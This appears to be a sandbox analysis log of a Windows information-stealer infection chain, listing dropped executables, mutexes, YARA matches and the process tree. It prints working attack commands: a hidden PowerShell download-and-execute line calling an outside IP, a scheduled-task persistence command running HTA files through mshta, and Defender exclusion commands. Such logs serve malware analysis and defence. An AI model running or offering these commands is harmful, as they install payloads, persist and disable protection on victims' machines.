                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C557F202_2_6C557F20
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C51DFC02_2_6C51DFC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C583FC02_2_6C583FC0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4ABFF02_2_6C4ABFF0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C421F902_2_6C421F90
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C45D8102_2_6C45D810
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C40D8E02_2_6C40D8E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4338E02_2_6C4338E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C55B8F02_2_6C55B8F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DF8F02_2_6C4DF8F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C47F9602_2_6C47F960
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4BD9602_2_6C4BD960
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C54F9002_2_6C54F900
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4B59202_2_6C4B5920
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4999C02_2_6C4999C0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4399D02_2_6C4399D0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4659F02_2_6C4659F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4979F02_2_6C4979F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4119802_2_6C411980
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4D19902_2_6C4D1990
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C589A502_2_6C589A50
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C43FA102_2_6C43FA10
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4FDA302_2_6C4FDA30
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C401AE02_2_6C401AE0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DDAB02_2_6C4DDAB0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4DFB602_2_6C4DFB60
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C44BB202_2_6C44BB20
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C447BF02_2_6C447BF0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C3F1B802_2_6C3F1B80
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4E5B902_2_6C4E5B90
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C459BA02_2_6C459BA0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4C9BB02_2_6C4C9BB0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C48D4102_2_6C48D410
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4E94302_2_6C4E9430
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4014E02_2_6C4014E0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C5814A02_2_6C5814A0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C54F5102_2_6C54F510
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4675002_2_6C467500
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4155102_2_6C415510
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4855F02_2_6C4855F0
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4395902_2_6C439590
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4556402_2_6C455640
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4196502_2_6C419650
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4296002_2_6C429600
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeCode function: 2_2_6C4776102_2_6C477610
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_00485C835_2_00485C83
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_0048735A5_2_0048735A
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_004C88605_2_004C8860
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_00484DE05_2_00484DE0
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_00484B305_2_00484B30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FE88606_2_00FE8860
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FA4DE06_2_00FA4DE0
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FA4B306_2_00FA4B30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 6_2_00FD7F366_2_00FD7F36
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FE88607_2_00FE8860
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FA4DE07_2_00FA4DE0
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FA4B307_2_00FA4B30
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeCode function: 7_2_00FD7F367_2_00FD7F36
Source: Joe Sandbox View | Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: String function: 6C423620 appears 95 times
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: String function: 6C429B10 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: String function: 6C45C5E0 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: String function: 6C539F30 appears 52 times
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Code function: String function: 004980C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Code function: String function: 00FB80C0 appears 260 times
Source: random[1].exe.15.dr | Static PE information: Data appended to the last section found
Source: 36ac23ea9d.exe.15.dr | Static PE information: Data appended to the last section found
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: 5EfYBe3nch.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: 2.2.DLTDCR8UJINP8YM8Y.exe.730000.0.unpack, type: UNPACKEDPE | Matched rule: infostealer_win_stealc_str_oct24 author = Sekoia.io, description = Finds Stealc standalone samples (or dumps) based on the strings, creation_date = 2024-10-20, classification = TLP:CLEAR, version = 1.0, id = 7448fafe-206c-4f9c-b5a3-cbabec12a45b
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exe, type: DROPPED | Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
Source: C:\Users\user\AppData\Local\Temp\1027002001\10DCQZI.exe, type: DROPPED | Matched rule: MALWARE_Win_CoreBot author = ditekSHen, description = Detects CoreBot, snort_sid = 920211-920212
Source: 5EfYBe3nch.exe | Static PE information: Section: ZLIB complexity 0.9998972039473685
Source: 5EfYBe3nch.exe | Static PE information: Section: dalsczsh ZLIB complexity 0.9948622258272617
Source: random[1].exe.15.dr | Static PE information: Section: ZLIB complexity 0.9999036287006579
Source: random[1].exe.15.dr | Static PE information: Section: cywnalex ZLIB complexity 0.9953611696950032
Source: 36ac23ea9d.exe.15.dr | Static PE information: Section: ZLIB complexity 0.9999036287006579
Source: 36ac23ea9d.exe.15.dr | Static PE information: Section: cywnalex ZLIB complexity 0.9953611696950032
Source: iSHmPkn[1].exe.15.dr | Static PE information: Section: ZLIB complexity 1.00067138671875
Source: iSHmPkn[1].exe.15.dr | Static PE information: Section: xuvnqsmj ZLIB complexity 0.994574785670545
Source: iSHmPkn.exe.15.dr | Static PE information: Section: ZLIB complexity 1.00067138671875
Source: iSHmPkn.exe.15.dr | Static PE information: Section: xuvnqsmj ZLIB complexity 0.994574785670545
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: Section: ZLIB complexity 0.9981477744464945
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: Section: ZLIB complexity 0.99796875
Source: jyidkjkfhjawd.exe.17.dr | Static PE information: Section: .data ZLIB complexity 0.9965319237854804
Source: 10DCQZI.exe.15.dr, Options.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10DCQZI.exe.15.dr, Options.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: eXbhgU9[1].exe.15.dr, Program.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: eXbhgU9[1].exe.15.dr, Program.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: eXbhgU9.exe.15.dr, Program.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: eXbhgU9.exe.15.dr, Program.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 10DCQZI[1].exe.15.dr, Options.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 10DCQZI[1].exe.15.dr, Options.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winEXE@128/103@0/23
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Code function: 2_2_6C460300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 2_2_6C460300
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\HL3OV0KQ.htm
Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe | Mutant created: \Sessions\1\BaseNamedObjects\4148ce17-5f2b-4314-8b16-31b6a48899e4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7968:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5720:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7112:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1820:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7164:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5220:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6028:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7460:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2308:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6532:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4904:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5264:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4092:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5768:120:WilError_03
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | File created: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe
Source: C:\YQNZByFp\jyidkjkfhjawd.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: DLTDCR8UJINP8YM8Y.exe, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmp | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: 5EfYBe3nch.exe, 00000000.00000003.1731396091.0000000005C37000.00000004.00000800.00020000.00000000.sdmp, 5EfYBe3nch.exe, 00000000.00000003.1742666205.0000000005C01000.00000004.00000800.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000003.2083119638.00000000053C5000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2290897548.00000000054DC000.00000004.00000020.00020000.00000000.sdmp, DLTDCR8UJINP8YM8Y.exe, 00000002.00000002.2298206762.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: 5EfYBe3nch.exe | Virustotal: Detection: 57%
Source: 5EfYBe3nch.exe | ReversingLabs: Detection: 68%
Source: DLTDCR8UJINP8YM8Y.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 31FYMQUCQX14ZVCZU2HAYNV7V.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | File read: C:\Users\user\Desktop\5EfYBe3nch.exe
Source: unknown | Process created: C:\Users\user\Desktop\5EfYBe3nch.exe "C:\Users\user\Desktop\5EfYBe3nch.exe"
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Process created: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe "C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe"
Source: C:\Users\user\Desktop\5EfYBe3nch.exe | Process created: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe "C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe"
Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2596 --field-trial-handle=2532,i,194429869990168625,15952654104286526846,262144 /prefetch:8
Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\GIIIIJDHJE.exe"
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Users\user\Documents\GIIIIJDHJE.exe "C:\Users\user\Documents\GIIIIJDHJE.exe"
Source: C:\Users\user\Documents\GIIIIJDHJE.exe | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown | Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe "C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Process created: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe "C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe"
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\YQNZByFp'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" "
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1026818021\am.cmd" any_word
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\mshta.exe mshta "C:\Temp\.hta"
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /delete /tn "AutoRunHTA" /f
                                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "AutoRunHTA" /tr "cmd.exe /c for %f in (\"C:\Temp\*.gif\") do (copy \"%f\" \"C:\Temp\\random.hta\" & start mshta \"C:\Temp\\random.hta\")" /sc minute /mo 25 /ru "user" /rl HIGHEST /f
                                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd.exe /c for %f in ("C:\Temp\*.gif") do (copy "%f" "C:\Temp\\random.hta" & start mshta "C:\Temp\\random.hta")
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "C:\Temp\\random.hta"
                                      Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command Add-MpPreference -ExclusionPath 'C:\Users'
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
